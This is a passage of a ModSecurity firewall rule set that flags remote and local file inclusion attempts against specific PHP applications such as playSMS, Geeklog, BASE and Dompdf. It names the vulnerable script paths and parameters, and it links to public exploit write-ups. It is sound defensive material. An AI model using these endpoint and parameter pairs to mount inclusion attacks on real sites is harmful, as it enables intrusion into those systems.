&TX:'/RFI.*ARGS:editform/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS phpAddEdit editform parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2010485) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS phptraverse mp3_id.php GLOBALS Parameter Remote File Inclusion Attempt SecRule REQUEST_LINE "@contains /assets/plugins/mp3_id/mp3_id.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010485,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS phptraverse mp3_id.php GLOBALS Parameter Remote File Inclusion Attempt',tag:'web-application-attack',tag:'url,www.packetstormsecurity.nl/0911-exploits/phptraverse-rfi.txt'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:GLOBALS[BASE]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS phptraverse mp3_id.php GLOBALS Parameter Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009085) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS playSMS init.php apps_path plug parameter local file inclusion SecRule REQUEST_LINE "@contains /plugin/gateway/gnokii/init.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009085,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS playSMS init.php apps_path plug parameter local file inclusion',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:apps_path[plug] "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS playSMS init.php apps_path plug parameter local file inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009086) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS playSMS init.php apps_path themes parameter remote file inclusion SecRule REQUEST_LINE "@contains /plugin/themes/default/init.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009086,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS playSMS init.php apps_path themes parameter remote file inclusion',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:apps_path[themes]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS playSMS init.php apps_path themes parameter remote file inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009087) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS playSMS init.php apps_path themes parameter local file inclusion SecRule REQUEST_LINE "@contains /plugin/themes/default/init.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009087,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS playSMS init.php apps_path themes parameter local file inclusion',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:apps_path[themes] "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS playSMS init.php apps_path themes parameter local file inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009088) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS playSMS function.php apps_path libs parameter remote file inclusion SecRule REQUEST_LINE "@contains /lib/function.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009088,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS playSMS function.php apps_path libs parameter remote file inclusion',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:apps_path[libs]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS playSMS function.php apps_path libs parameter remote file inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009089) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS playSMS function.php apps_path libs parameter local file inclusion SecRule REQUEST_LINE "@contains /lib/function.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009089,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS playSMS function.php apps_path libs parameter local file inclusion',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:apps_path[libs] "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS playSMS function.php apps_path libs parameter local file inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009887) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ProjectButler RFI attempt SecRule REQUEST_LINE "@contains /pda_projects.php?offset=http\:" "phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009887,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS ProjectButler RFI attempt ',tag:'web-application-attack',tag:'url,www.packetstormsecurity.org/0908-exploits/projectbutler-rfi.txt',ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ProjectButler RFI attempt ',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009320) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS rgboard _footer.php skin_path parameter local file inclusion SecRule REQUEST_LINE "@contains /_footer.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009320,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS rgboard _footer.php skin_path parameter local file inclusion',tag:'web-application-attack',tag:'bugtraq,33621'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:skin_path "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS rgboard _footer.php skin_path parameter local file inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009321) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS rgboard footer.php _path parameter remote file inclusion SecRule REQUEST_LINE "@contains /footer.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009321,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS rgboard footer.php _path parameter remote file inclusion',tag:'web-application-attack',tag:'bugtraq,33621'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:_path[counter]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS rgboard footer.php _path parameter remote file inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009331) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS tinyCMS templater.php Local File Inclusion SecRule REQUEST_LINE "@contains /templater.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009331,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS tinyCMS templater.php Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,30785'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:config[template] "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS tinyCMS templater.php Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009416) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS txtSQL startup.php CFG Parameter Remote File Inclusion SecRule REQUEST_LINE "@contains /startup.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009416,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS txtSQL startup.php CFG Parameter Remote File Inclusion',tag:'web-application-attack',tag:'bugtraq,30625'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:CFG[txtsql][class]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS txtSQL startup.php CFG Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2003670) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Workbench Survival Guide Remote Inclusion Attempt -- headerfile.php path SecRule REQUEST_LINE "@contains /header.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003670,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS Workbench Survival Guide Remote Inclusion Attempt -- headerfile.php path',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3848'" SecRule &TX:'/RFI.*ARGS:path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Workbench Survival Guide Remote Inclusion Attempt -- headerfile.php path',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (100000358) SpiderLabs Research (SLR) Public Vulns: GPL WEB_SPECIFIC_APPS BASE base_include.inc.php remote file include SecRule QUERY_STRING|REQUEST_BODY "@contains /base_include.inc.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:100000358,rev:4,msg:'SLR: GPL WEB_SPECIFIC_APPS BASE base_include.inc.php remote file include',tag:'web-application-attack'" SecRule QUERY_STRING|REQUEST_BODY "@contains BASE_path=" "chain" SecRule QUERY_STRING|REQUEST_BODY "(?i:BASE_path=(https?|ftp))" "ctl:auditLogParts=+E,setvar:'tx.msg=GPL WEB_SPECIFIC_APPS BASE base_include.inc.php remote file include',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (100000356) SpiderLabs Research (SLR) Public Vulns: GPL WEB_SPECIFIC_APPS BASE base_qry_common.php remote file include SecRule REQUEST_LINE "@contains /base_qry_common.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:100000356,rev:2,msg:'SLR: GPL WEB_SPECIFIC_APPS BASE base_qry_common.php remote file include',tag:'web-application-attack'" SecRule &TX:'/RFI.*ARGS:BASE_path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=GPL WEB_SPECIFIC_APPS BASE base_qry_common.php remote file include',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (100000357) SpiderLabs Research (SLR) Public Vulns: GPL WEB_SPECIFIC_APPS BASE base_stat_common.php remote file include SecRule REQUEST_LINE "@contains /base_stat_common.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:100000357,rev:2,msg:'SLR: GPL WEB_SPECIFIC_APPS BASE base_stat_common.php remote file include',tag:'web-application-attack'" SecRule &TX:'/RFI.*ARGS:BASE_path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=GPL WEB_SPECIFIC_APPS BASE base_stat_common.php remote file include',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (100000730) SpiderLabs Research (SLR) Public Vulns: GPL WEB_SPECIFIC_APPS Geeklog BlackList.Examine.class.php remote file include SecRule REQUEST_LINE "@contains plugins/spamx/BlackList.Examine.class.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:100000730,rev:3,msg:'SLR: GPL WEB_SPECIFIC_APPS Geeklog BlackList.Examine.class.php remote file include',tag:'web-application-attack',tag:'bugtraq,18740'" SecRule &TX:'/RFI.*ARGS:$_CONF[path]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=GPL WEB_SPECIFIC_APPS Geeklog BlackList.Examine.class.php remote file include',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (100000731) SpiderLabs Research (SLR) Public Vulns: GPL WEB_SPECIFIC_APPS Geeklog DeleteComment.Action.class.php remote file include SecRule REQUEST_LINE "@contains plugins/spamx/DeleteComment.Action.class.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:100000731,rev:3,msg:'SLR: GPL WEB_SPECIFIC_APPS Geeklog DeleteComment.Action.class.php remote file include',tag:'web-application-attack',tag:'bugtraq,18740'" SecRule &TX:'/RFI.*ARGS:$_CONF[path]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=GPL WEB_SPECIFIC_APPS Geeklog DeleteComment.Action.class.php remote file include',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (100000737) SpiderLabs Research (SLR) Public Vulns: GPL WEB_SPECIFIC_APPS Geeklog EditHeader.Admin.class.php remote file include SecRule REQUEST_LINE "@contains plugins/spamx/EditHeader.Admin.class.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:100000737,rev:3,msg:'SLR: GPL WEB_SPECIFIC_APPS Geeklog EditHeader.Admin.class.php remote file include',tag:'web-application-attack',tag:'bugtraq,18740'" SecRule &TX:'/RFI.*ARGS:$_CONF[path]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=GPL WEB_SPECIFIC_APPS Geeklog EditHeader.Admin.class.php remote file include',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (100000738) SpiderLabs Research (SLR) Public Vulns: GPL WEB_SPECIFIC_APPS Geeklog EditIP.Admin.class.php remote file include SecRule REQUEST_LINE "@contains plugins/spamx/EditIP.Admin.class.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:100000738,rev:3,msg:'SLR: GPL WEB_SPECIFIC_APPS Geeklog EditIP.Admin.class.php remote file include',tag:'web-application-attack',tag:'bugtraq,18740'" SecRule &TX:'/RFI.*ARGS:$_CONF[path]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=GPL WEB_SPECIFIC_APPS Geeklog EditIP.Admin.class.php remote file include',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (100000732) SpiderLabs Research (SLR) Public Vulns: GPL WEB_SPECIFIC_APPS Geeklog EditIPofURL.Admin.class.php remote file include SecRule REQUEST_LINE "@contains plugins/spamx/EditIPofURL.Admin.class.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:100000732,rev:3,msg:'SLR: GPL WEB_SPECIFIC_APPS Geeklog EditIPofURL.Admin.class.php remote file include',tag:'web-application-attack',tag:'bugtraq,18740'" SecRule &TX:'/RFI.*ARGS:$_CONF[path]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=GPL WEB_SPECIFIC_APPS Geeklog EditIPofURL.Admin.class.php remote file include',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (100000739) SpiderLabs Research (SLR) Public Vulns: GPL WEB_SPECIFIC_APPS Geeklog IPofUrl.Examine.class.php remote file include SecRule REQUEST_LINE "@contains plugins/spamx/IPofUrl.Examine.class.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:100000739,rev:3,msg:'SLR: GPL WEB_SPECIFIC_APPS Geeklog IPofUrl.Examine.class.php remote file include',tag:'web-application-attack',tag:'bugtraq,18740'" SecRule &TX:'/RFI.*ARGS:$_CONF[path]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=GPL WEB_SPECIFIC_APPS Geeklog IPofUrl.Examine.class.php remote file include',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (100000740) SpiderLabs Research (SLR) Public Vulns: GPL WEB_SPECIFIC_APPS Geeklog Import.Admin.class.php remote file include SecRule REQUEST_LINE "@contains plugins/spamx/Import.Admin.class.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:100000740,rev:3,msg:'SLR: GPL WEB_SPECIFIC_APPS Geeklog Import.Admin.class.php remote file include',tag:'web-application-attack',tag:'bugtraq,18740'" SecRule &TX:'/RFI.*ARGS:$_CONF[path]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=GPL WEB_SPECIFIC_APPS Geeklog Import.Admin.class.php remote file include',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (100000741) SpiderLabs Research (SLR) Public Vulns: GPL WEB_SPECIFIC_APPS Geeklog LogView.Admin.class.php remote file include SecRule REQUEST_LINE "@contains plugins/spamx/LogView.Admin.class.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:100000741,rev:3,msg:'SLR: GPL WEB_SPECIFIC_APPS Geeklog LogView.Admin.class.php remote file include',tag:'web-application-attack',tag:'bugtraq,18740'" SecRule &TX:'/RFI.*ARGS:$_CONF[path]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=GPL WEB_SPECIFIC_APPS Geeklog LogView.Admin.class.php remote file include',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (100000733) SpiderLabs Research (SLR) Public Vulns: GPL WEB_SPECIFIC_APPS Geeklog MTBlackList.Examine.class.php remote file include SecRule REQUEST_LINE "@contains plugins/spamx/MTBlackList.Examine.class.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:100000733,rev:3,msg:'SLR: GPL WEB_SPECIFIC_APPS Geeklog MTBlackList.Examine.class.php remote file include',tag:'web-application-attack',tag:'bugtraq,18740'" SecRule &TX:'/RFI.*ARGS:$_CONF[path]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=GPL WEB_SPECIFIC_APPS Geeklog MTBlackList.Examine.class.php remote file include',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (100000735) SpiderLabs Research (SLR) Public Vulns: GPL WEB_SPECIFIC_APPS Geeklog MailAdmin.Action.class.php remote file include SecRule REQUEST_LINE "@contains plugins/spamx/MailAdmin.Action.class.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:100000735,rev:3,msg:'SLR: GPL WEB_SPECIFIC_APPS Geeklog MailAdmin.Action.class.php remote file include',tag:'web-application-attack',tag:'bugtraq,18740'" SecRule &TX:'/RFI.*ARGS:$_CONF[path]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=GPL WEB_SPECIFIC_APPS Geeklog MailAdmin.Action.class.php remote file include',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (100000736) SpiderLabs Research (SLR) Public Vulns: GPL WEB_SPECIFIC_APPS Geeklog MassDelTrackback.Admin.class.php remote file include SecRule REQUEST_LINE "@contains plugins/spamx/MassDelTrackback.Admin.class.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:100000736,rev:3,msg:'SLR: GPL WEB_SPECIFIC_APPS Geeklog MassDelTrackback.Admin.class.php remote file include',tag:'web-application-attack',tag:'bugtraq,18740'" SecRule &TX:'/RFI.*ARGS:$_CONF[path]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=GPL WEB_SPECIFIC_APPS Geeklog MassDelTrackback.Admin.class.php remote file include',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (100000734) SpiderLabs Research (SLR) Public Vulns: GPL WEB_SPECIFIC_APPS Geeklog MassDelete.Admin.class.php remote file include SecRule REQUEST_LINE "@contains plugins/spamx/MassDelete.Admin.class.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:100000734,rev:3,msg:'SLR: GPL WEB_SPECIFIC_APPS Geeklog MassDelete.Admin.class.php remote file include',tag:'web-application-attack',tag:'bugtraq,18740'" SecRule &TX:'/RFI.*ARGS:$_CONF[path]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=GPL WEB_SPECIFIC_APPS Geeklog MassDelete.Admin.class.php remote file include',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (100000728) SpiderLabs Research (SLR) Public Vulns: GPL WEB_SPECIFIC_APPS Geeklog functions.inc remote file include SecRule REQUEST_LINE "@contains plugins/links/functions.inc" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:100000728,rev:3,msg:'SLR: GPL WEB_SPECIFIC_APPS Geeklog functions.inc remote file include',tag:'web-application-attack',tag:'bugtraq,18740'" SecRule &TX:'/RFI.*ARGS:$_CONF[path]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=GPL WEB_SPECIFIC_APPS Geeklog functions.inc remote file include',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (100000729) SpiderLabs Research (SLR) Public Vulns: GPL WEB_SPECIFIC_APPS Geeklog functions.inc remote file include SecRule REQUEST_LINE "@contains plugins/polls/functions.inc" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:100000729,rev:3,msg:'SLR: GPL WEB_SPECIFIC_APPS Geeklog functions.inc remote file include',tag:'web-application-attack',tag:'bugtraq,18740'" SecRule &TX:'/RFI.*ARGS:$_CONF[path]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=GPL WEB_SPECIFIC_APPS Geeklog functions.inc remote file include',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (100000742) SpiderLabs Research (SLR) Public Vulns: GPL WEB_SPECIFIC_APPS Geeklog functions.inc remote file include SecRule REQUEST_LINE "@contains plugins/staticpages/functions.inc" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:100000742,rev:3,msg:'SLR: GPL WEB_SPECIFIC_APPS Geeklog functions.inc remote file include',tag:'web-application-attack',tag:'bugtraq,18740'" SecRule &TX:'/RFI.*ARGS:$_CONF[path]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=GPL WEB_SPECIFIC_APPS Geeklog functions.inc remote file include',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (100000908) SpiderLabs Research (SLR) Public Vulns: GPL WEB_SPECIFIC_APPS WEB-PHP phpMyWebmin create_file script remote file include SecRule REQUEST_LINE "@contains create_file.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:100000908,rev:1,msg:'SLR: GPL WEB_SPECIFIC_APPS WEB-PHP phpMyWebmin create_file script remote file include',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/20281/info'" SecRule &TX:'/RFI.*ARGS:target/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=GPL WEB_SPECIFIC_APPS WEB-PHP phpMyWebmin create_file script remote file include',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2011565) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Dompdf dompdf.php input_file Parameter Remote File Inclusion Attempt SecRule REQUEST_LINE "@contains /dompdf.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011565,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Dompdf dompdf.php input_file Parameter Remote File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:input_file/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Dompdf dompdf.php input_file Parameter Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2011564) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PHP Classifieds class.phpmailer.php lang_path Parameter Remote File Inclusion Attempt SecRule REQUEST_LINE "@contains /class.phpmailer.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011564,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS PHP Classifieds class.phpmailer.php lang_path Parameter Remote File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:lang_path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PHP Classifieds class.phpmailer.php lang_path Parameter Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2011563) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS DynPage dynpage_load.php file Parameter Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /content/dynpage_load.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011563,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS DynPage dynpage_load.php file Parameter Local File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:file "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS 